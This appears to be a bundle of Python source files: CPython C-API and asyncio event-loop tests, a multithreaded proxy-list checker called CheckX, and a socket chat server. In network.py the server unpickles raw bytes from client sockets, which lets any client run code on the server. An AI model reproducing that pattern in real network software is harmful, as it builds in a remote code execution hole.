names.append('PyThread_get_thread_native_id')
# Python/frozenmain.c fails to build on Windows when the symbols are
# missing:
# - PyWinFreeze_ExeInit
# - PyWinFreeze_ExeTerm
# - PyInitFrozenExtensions
if os.name != 'nt':
names.append('Py_FrozenMain')
for name in names:
with self.subTest(name=name):
self.assertTrue(hasattr(ctypes.pythonapi, name))
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with threading_helper.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
def test_subinterps_recent_language_features(self):
r, w = os.pipe()
code = """if 1:
import pickle
with open({:d}, "wb") as f:
@(lambda x:x) # Py 3.9
def noop(x): return x
a = (b := f'1{{2}}3') + noop('x') # Py 3.8 (:=) / 3.6 (f'')
async def foo(arg): return await arg # Py 3.5
pickle.dump(dict(a=a, b=b), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertEqual(pickle.load(f), {'a': '123x', 'b': '123'})
def test_mutate_exception(self):
"""
Exceptions saved in global module state get shared between
individual module instances. This test checks whether or not
a change in one interpreter's module gets reflected into the
other ones.
"""
import binascii
support.run_in_subinterp("import binascii; binascii.Error.foobar = 'foobar'")
self.assertFalse(hasattr(binascii.Error, "foobar"))
@unittest.skipIf(_testmultiphase is None, "test requires _testmultiphase module")
def test_module_state_shared_in_global(self):
"""
bpo-44050: Extension module state should be shared between interpreters
when it doesn't support sub-interpreters.
"""
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
script = textwrap.dedent(f"""
import importlib.machinery
import importlib.util
import os
fullname = '_test_module_state_shared'
origin = importlib.util.find_spec('_testmultiphase').origin
loader = importlib.machinery.ExtensionFileLoader(fullname, origin)
spec = importlib.util.spec_from_loader(fullname, loader)
module = importlib.util.module_from_spec(spec)
attr_id = str(id(module.Error)).encode()
os.write({w}, attr_id)
""")
exec(script)
main_attr_id = os.read(r, 100)
ret = support.run_in_subinterp(script)
self.assertEqual(ret, 0)
subinterp_attr_id = os.read(r, 100)
self.assertEqual(main_attr_id, subinterp_attr_id)
class TestThreadState(unittest.TestCase):
@threading_helper.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
locals().update((name, getattr(_testcapi, name))
for name in dir(_testcapi)
if name.startswith('test_') and not name.endswith('_code'))
# Suppress warning from PyUnicode_FromUnicode().
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_widechar(self):
_testcapi.test_widechar()
def test_version_api_data(self):
self.assertEqual(_testcapi.Py_Version, sys.hexversion)
class Test_testinternalcapi(unittest.TestCase):
locals().update((name, getattr(_testinternalcapi, name))
for name in dir(_testinternalcapi)
if name.startswith('test_'))
@support.requires_subprocess()
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure(
'-c', code,
PYTHONMALLOC=self.PYTHONMALLOC,
# FreeBSD: instruct jemalloc to not fill freed() memory
# with junk byte 0x5a, see JEMALLOC(3)
MALLOC_CONF="junk:false",
)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfd\n"
r" at tail\+2: 0xfd\n"
r" .*\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: _PyMem_DebugMalloc: '
'Python memory allocator called without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
def check_pyobject_is_freed(self, func_name):
code = textwrap.dedent(f'''
import gc, os, sys, _testcapi
# Disable the GC to avoid crash on GC collection
gc.disable()
try:
_testcapi.{func_name}()
# Exit immediately to avoid a crash while deallocating
# the invalid object
os._exit(0)
except _testcapi.error:
os._exit(1)
''')
assert_python_ok(
'-c', code,
PYTHONMALLOC=self.PYTHONMALLOC,
MALLOC_CONF="junk:false",
)
def test_pyobject_null_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_null_is_freed')
def test_pyobject_uninitialized_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_uninitialized_is_freed')
def test_pyobject_forbidden_bytes_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_forbidden_bytes_is_freed')
def test_pyobject_freed_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_freed_is_freed')
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(support.with_pymalloc(), 'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
@unittest.skipIf(_testmultiphase is None, "test requires _testmultiphase module")
class Test_ModuleStateAccess(unittest.TestCase):
"""Test access to module start (PEP 573)"""
# The C part of the tests lives in _testmultiphase, in a module called
# _testmultiphase_meth_state_access.
# This module has multi-phase initialization, unlike _testcapi.
def setUp(self):
fullname = '_testmultiphase_meth_state_access' # XXX
origin = importlib.util.find_spec('_testmultiphase').origin
loader = importlib.machinery.ExtensionFileLoader(fullname, origin)
spec = importlib.util.spec_from_loader(fullname, loader)
module = importlib.util.module_from_spec(spec)
loader.exec_module(module)
self.module = module
def test_subclass_get_module(self):
"""PyType_GetModule for defining_class"""
class StateAccessType_Subclass(self.module.StateAccessType):
pass
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_subclass_get_module_with_super(self):
class StateAccessType_Subclass(self.module.StateAccessType):
def get_defining_module(self):
return super().get_defining_module()
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_state_access(self):
"""Checks methods defined with and without argument clinic
This tests a no-arg method (get_count) and a method with
both a positional and keyword argument.
"""
a = self.module.StateAccessType()
b = self.module.StateAccessType()
methods = {
'clinic': a.increment_count_clinic,
'noclinic': a.increment_count_noclinic,
}
for name, increment_count in methods.items():
with self.subTest(name):
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
increment_count()
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 1)
increment_count(3)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 4)
increment_count(-2, twice=True)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
with self.assertRaises(TypeError):
increment_count(thrice=3)
with self.assertRaises(TypeError):
increment_count(1, 2, 3)
def test_get_module_bad_def(self):
# PyType_GetModuleByDef fails gracefully if it doesn't
# find what it's looking for.
# see bpo-46433
instance = self.module.StateAccessType()
with self.assertRaises(TypeError):
instance.getmodulebydef_bad_def()
def test_get_module_static_in_mro(self):
# Here, the class PyType_GetModuleByDef is looking for
# appears in the MRO after a static type (Exception).
# see bpo-46433
class Subclass(BaseException, self.module.StateAccessType):
pass
self.assertIs(Subclass().get_defining_module(), self.module)
if __name__ == "__main__":
unittest.main()
|
CheckX.py
|
from multiprocessing.dummy import Pool as ThreadPool
from os import path, mkdir, system, name
from threading import Thread, Lock
from time import sleep, strftime, gmtime, time
from traceback import format_exc
from colorama import Fore, init
from console.utils import set_title
from easygui import fileopenbox
from requests import Session, exceptions
from yaml import safe_load
default_values = '''checker:
# Check if current version of CheckX is latest
check_for_updates: true
# Remove duplicate proxies
remove_duplicates: true
# Check site
check_site: 'https://azenv.net'
# Save dead proxies
save_dead: true
# Normal users should keep this false unless problem start happening
debugging: false
'''
if path.exists('Settings.yml'):
settings = safe_load(open('Settings.yml', 'r', errors='ignore'))
else:
open('Settings.yml', 'w').write(default_values)
settings = safe_load(open('Settings.yml', 'r', errors='ignore'))
class Main:
def __init__(self):
self.dead = 0
self.live = 0
self.cpm = 0
self.trasp = 0
self.checked = 0
self.stop = True
self.start_time = 0
self.announcement = ''
self.checktype = ''
self.timeout = 5000
self.threads = 200
# self.checkforupdates()
self.settings()
self.loadproxy()
self.resultfolder()
self.get_announcement()
self.start()
def now_time(self):
return strftime("%H:%M:%S", gmtime(time() - self.start_time))
def writing(self, line):
lock.acquire()
open(f'{self.folder}/{line[1]}.txt', 'a', encoding='u8').write(f'{line[0]}\n')
lock.release()
def check_proxies(self, proxy):
proxy_form = {}
if proxy.count(':') == 3:
spl = proxy.split(':')
proxy = f'{spl[2]}:{spl[3]}@{spl[0]}:{spl[1]}'
if self.checktype in ['https', 'http']:
proxy_form = {'http': f"http://{proxy}", 'https': f"https://{proxy}"}
elif self.checktype in ['socks4', 'socks5']:
line = f"{self.checktype}://{proxy}"
proxy_form = {'http': line, 'https': line}
try:
r = session.get(url=Checker.check_site, proxies=proxy_form, timeout=self.timeout).text
self.checked += 1
if r.__contains__(myip):
self.trasp += 1
self.writing([proxy, 'Transparent'])
else:
self.live += 1
self.writing([proxy, 'Live'])
return
except exceptions.RequestException:
self.dead += 1
self.checked += 1
if Checker.save_dead:
self.writing([proxy, 'Bad'])
return
except:
if Checker.debug:
print(f'Error: {format_exc(limit=1)}')
return
def tite(self):
while self.stop:
proxies = len(self.proxylist)
set_title(
f'CheckX-{version} | '
f'{"" if self.live == 0 else f" | Live: {self.live}"}'
f'{"" if self.dead == 0 else f" | Dead: {self.dead}"}'
f'{"" if self.trasp == 0 else f" | Transparent: {self.trasp}"}'
f' | Left: {proxies - self.checked}/{proxies}'
f' | CPM: {self.cpm}'
f' | {self.now_time()} Elapsed')
def cpmcounter(self):
while self.stop:
if self.checked >= 1:
now = self.checked
sleep(4)
self.cpm = (self.checked - now) * 15
def checkforupdates(self):
try:
gitversion = session.get("https://raw.githubusercontent.com/ShadowOxygen/CheckX/master/version").text
if f'{version}\n' != gitversion:
print(sign)
print(f"{red}Your version is outdated.")
print(f"Your version: {version}\n")
print(f'Latest version: {gitversion}Get latest version in the link below')
print(f"https://github.com/ShadowOxygen/CheckX/releases\nStarting in 5 seconds...{cyan}")
sleep(5)
clear()
except:
if Checker.debug:
print(f"{red} Error while checking for updates: \n{format_exc(limit=1)}\n")
def loadproxy(self):
while True:
try:
print(f"\n{cyan}[+] Please Import Your Proxies List.....")
sleep(0.3)
loader = open(fileopenbox(title="Load Proxies List", default="*.txt"), 'r', encoding="utf8",
errors='ignore').read().split('\n')
if Checker.remove_dup:
self.proxylist = list(set([x.strip() for x in loader if ":" in x and x != '']))
else:
self.proxylist = [x.strip() for x in loader if ":" in x and x != '']
length_file = len(self.proxylist)
if length_file == 0:
print(f'{red}No proxies found! Please make sure file have proxies...')
continue
print(f"{cyan} > Imported {length_file} proxies from File")
break
except:
if Checker.debug:
print(f"{red}Error while loading proxies: \n{format_exc(limit=1)}\n")
continue
def get_announcement(self):
try:
announcement = session.get(
'https://raw.githubusercontent.com/ShadowOxygen/OxygenX/master/announcement').text.split("Color: ")
color = announcement[1].lower()
if color == 'red\n':
color = red
elif color == 'white\n':
color = white
elif color == 'blue\n':
color = Fore.LIGHTBLUE_EX
elif color == 'green\n':
color = green
elif color == 'cyan\n':
color = cyan
elif color == 'magenta\n':
color = Fore.LIGHTMAGENTA_EX
elif color == 'yellow\n':
color = Fore.LIGHTYELLOW_EX
self.announcement = f"{color}{announcement[0]}"
except:
if Checker.debug:
print(f"{red}Error while displaying announcement: \n{format_exc(limit=1)}\n")
return
def resultfolder(self):
unix = str(strftime('[%d-%m-%Y %H-%M-%S]'))
self.folder = f'results/{unix}'
if not path.exists('results'):
mkdir('results')
if not path.exists(self.folder):
mkdir(self.folder)
def start(self):
print('\nLoading Threads...\n')
Thread(target=self.cpmcounter, daemon=True).start()
pool = ThreadPool(processes=self.threads)
clear()
Thread(target=self.tite).start()
print(sign)
print(self.announcement)
print(f'{green}=======Settings=========\n'
f'[S] Threads: {self.threads}\n'
f'[S] Timeout: {self.timeout}s\n'
f'[S] Proxy type: {self.checktype}\n'
'========================\n')
print(f'{cyan}[Z] Please wait for proxies to finish checking...')
self.start_time = time()
pool.imap_unordered(func=self.check_proxies, iterable=self.proxylist)
pool.close()
pool.join()
self.stop = False
cyanz = f'{white}[{Fore.CYAN}>{white}]'
results = f'\n{cyanz} Live proxies: {green}{self.live}\n' \
f'{cyanz} Transparent proxies: {Fore.LIGHTYELLOW_EX}{self.trasp}\n' \
f'{cyanz} Dead proxies: {red}{self.dead}\n' \
f'{cyanz} Speed: {cyan}{round(self.checked / (time() - self.start_time), 2)} proxies/s\n' \
f'{cyanz} Total time checking: {cyan}{self.now_time()}\n\n' \
f'{red}\n[EXIT] You can now exit the program...'
print(results)
input()
exit()
def settings(self):
print(sign)
self.threads = int(input('[+] Threads for Checking (Needs to be more than 1): '))
while True:
self.checktype = str(input('[+] Proxy Type (HTTP, HTTPS, SOCKS4, SOCKS5): ')).lower()
if self.checktype not in ['https', 'http', 'socks4', 'socks5']:
print(f'{red}[Error] Proxy type is not https, http, socks4, socks5. Please reenter')
continue
else:
break
self.timeout = int(input('[+] Proxy timeout (counted in milliseconds: 1000 = 1 second): ')) / 1000
class Checker:
version_check = bool(settings['checker']['check_for_updates'])
remove_dup = bool(settings['checker']['remove_duplicates'])
check_site = str(settings['checker']['check_site']).lower()
save_dead = bool(settings['checker']['save_dead'])
debug = bool(settings['checker']['debugging'])
if __name__ == '__main__':
init()
clear = lambda: system('cls' if name == 'nt' else 'clear')
lock = Lock()
version = '2.0'
session = Session()
red = Fore.LIGHTRED_EX
green = Fore.LIGHTGREEN_EX
cyan = Fore.LIGHTCYAN_EX
white = Fore.LIGHTWHITE_EX
sign = f'''{cyan}
_________ .__ __ ____ ___
\_ ___ \| |__ ____ ____ | | __\ \/ /
/ \ \/| | \_/ __ \_/ ___\| |/ / \ /
\\ \___| Y \ ___/\ \___| < / \\
\______ /___| /\___ >\___ >__|_ \/___/\ \\
\/ \/ \/ \/ \/ \_/
\n'''
myip = str(session.get('http://api.ipify.org').text)
set_title(f'CheckX-{version} | By ShadowOxygen')
Main()
|
network.py
|
from . import settings as globalsettings
from . import functions, command
import socket, pickle, datetime, errno, select
from threading import Thread
class User():
def __init__(self, socket, ip, username=''):
self.socket = socket
self.ip = ip
self.username = username
self.admin = False
def get_user_ip(self):
return self.ip
def set_user_name(self, new_name):
self.username = new_name
def get_user_name(self):
return self.username
def close_connection(self):
self.socket.close()
def send_message(self, msgtype, message):
try:
self.socket.send(pickle.dumps({'type': msgtype, 'message': message}))
except ConnectionResetError:
print('user %s has probably disconnected.' % (self.get_user_name()))
Network.online_users.remove(self)
del self
except Exception as exception:
print(f'Could not send message to user {self.get_user_name()} error code: {exception}')
def set_admin(self, toggle):
self.admin = toggle
if toggle:
print(self.get_user_name() + " has logged as server administrator.")
def is_admin(self):
return self.admin
def kick_user(self):
print(self.get_user_name() + " has been kicked from the server!")
Network.online_users.remove(self)
del self
class Network():
online_users = []
rcon_password = ''
def __init__(self, hostname, port, max_users, rcon_pass, channels):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 10000, 3000))
self.hostname = hostname
self.max_users = max_users
self.rcon_pass = rcon_pass
Network.rcon_password = rcon_pass
self.channels = []
[self.channels.append({'channel_name': channel, 'messages': []}) for channel in channels]
self.sock.bind((socket.gethostname(), port))
self.sock.listen(5)
self.sock.settimeout(1)
print(f"{hostname} has been setup with the following settings: ")
print(f"port: {port}")
print(f"Max user count: {max_users}")
print(f"Rcon password: {rcon_pass}")
print(f"Channels: {channels}")
#first two parameters are reserved for user and channelname for every command function
self.rcon_command = command.Command('rcon', functions.rcon)
self.connection_thread = Thread(target=self.listen_to_connection)
self.packets_thread = Thread(target=self.listen_to_packets)
def start(self):
print("Server has started")
self.connection_thread.start()
self.packets_thread.start()
def listen_to_connection(self):
while True:
try:
#connection requests will be ignored if the current user count is equal or exceeds the maximum count.
if len(Network.online_users) >= self.max_users:
continue
socket, address = self.sock.accept()
socket.setblocking(0)
new_user = User(socket, address)
new_user.set_user_name(socket.recv(globalsettings.USERNAME_BUFFER).decode('UTF-8'))
try:
if len([user for user in Network.online_users if user.get_user_name() == new_user.get_user_name()]):
new_user.close_connection()
print("closing connection for this user...")
else:
print("Adding user %s" % (new_user.get_user_name()))
Network.online_users.append(new_user)
temp_users = Network.online_users
temp_users = [{'username': user.get_user_name(), 'id': i} for i, user in enumerate(Network.online_users)]
#stores channels details and messages in a temporary variable that gets altered by deleting every message prior to the five latest in every channel and gets sent to the new user
temp = self.channels
[channel.update(messages=channel['messages'][len(channel['messages'])-globalsettings.MAX_LOAD_MESSAGES_COUNT:]) for channel in temp if len(channel['messages']) > globalsettings.MAX_LOAD_MESSAGES_COUNT]
time = datetime.datetime.now()
join_message = f"<{time.hour}:{time.minute}:{time.second}> {new_user.get_user_name()} has joined the chat."
self.channels[0]['messages'].append(join_message)
new_user.send_message(globalsettings.SERVER_DETAILS, {'channels': temp, 'users': temp_users})
[user.send_message(globalsettings.SERVER_DETAILS, {'users': temp_users}) for user in Network.online_users if user != new_user]
[user.send_message(globalsettings.SERVER_MESSAGE, {'channel_name': self.channels[0]['channel_name'], 'message': join_message}) for user in Network.online_users if user != new_user]
except Exception as exception:
print(exception)
except:
pass
def listen_to_packets(self):
while True:
try:
messages = []
for user in Network.online_users:
try:
messages.append(functions.update_dict(pickle.loads(user.socket.recv(globalsettings.MAX_BUFFER)), 'user', user))
except ConnectionResetError:
time = datetime.datetime.now()
[user_ex.send_message(globalsettings.USER_LEFT,{'channel_name': self.channels[0]['channel_name'], 'username': user.get_user_name(), 'time': time}) for user_ex in Network.online_users if user_ex != user]
self.channels[0]['messages'].append(f"<{time.hour}:{time.minute}:{time.second}> {user.get_user_name()} has left the chat.")
print(self.channels[0]['messages'][len(self.channels[0]['messages'])-1])
Network.online_users.remove(user)
except:
pass
if len(messages):
#
time_text = f'<{datetime.datetime.now().hour}:{datetime.datetime.now().minute}:{datetime.datetime.now().second}>'
#sends every message to every user in the right channel...
for user in Network.online_users: [user.send_message(globalsettings.SERVER_MESSAGE,{'channel_name': message['channel_name'], 'message': functions.append_return([channel for channel in self.channels if channel['channel_name'] == message['channel_name']][0]['messages'], time_text + ' ' + message['user'].get_user_name() + ': ' + message['message'])}) for message in messages if message['message'][0] != globalsettings.COMMAND_PREFIX]
#removes every message that isn't starting with the command prefix
messages = [message for message in messages if message['message'][0] == globalsettings.COMMAND_PREFIX]
#
for message in messages:
#eliminates white spaces and splits the message
message_split = functions.split(message['message'])
try: [command for command in command.Command.server_commands if command.text == message_split[0][1:]][0].execute(message['user'], message['channel_name'],*message_split[1:])
#IndexError gets thrown when list index (0) out of range meaning no user with the specified name was found
except IndexError: message['user'].send_message(globalsettings.SERVER_MESSAGE, {'channel_name': message['channel_name'], 'message': 'Unknown command'})
#
except: message['user'].send_message(globalsettings.SERVER_MESSAGE, {"channel_name": message['channel_name'],"message":"Invalid command usage."})
except Exception as exception:
print(exception)
|
test_events.py
|
"""Tests for events.py."""
import functools
import gc
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import proactor_events
from asyncio import selector_events
from asyncio import sslproto
from asyncio import test_utils
try:
from test import support
except ImportError:
from asyncio import test_support as support
def data_file(filename):
if hasattr(support, 'TEST_HOME_DIR'):
fullname = os.path.join(support.TEST_HOME_DIR, filename)
if os.path.isfile(fullname):
return fullname
fullname = os.path.join(os.path.dirname(__file__), filename)
if os.path.isfile(fullname):
return fullname
raise FileNotFoundError(filename)
def osx_tiger():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
ONLYCERT = data_file('ssl_cert.pem')
ONLYKEY = data_file('ssl_key.pem')
SIGNED_CERTFILE = data_file('keycert3.pem')
SIGNING_CA = data_file('pycacert.pem')
PEERCERT = {'serialNumber': 'B09264B1F2DA21D1',
'version': 1,
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Nov 13 19:47:07 2022 GMT',
'notBefore': 'Jan 4 19:47:07 2013 GMT'}
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = asyncio.Future(loop=loop)
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = asyncio.Future(loop=loop)
self.completed = asyncio.Future(loop=loop)
self.disconnects = {fd: asyncio.Future(loop=loop) for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.loop.close()
gc.collect()
super().tearDown()
def test_run_until_complete_nesting(self):
@asyncio.coroutine
def coro1():
yield
@asyncio.coroutine
def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
@asyncio.coroutine
def cb():
self.loop.stop()
yield from asyncio.sleep(0.1, loop=self.loop)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
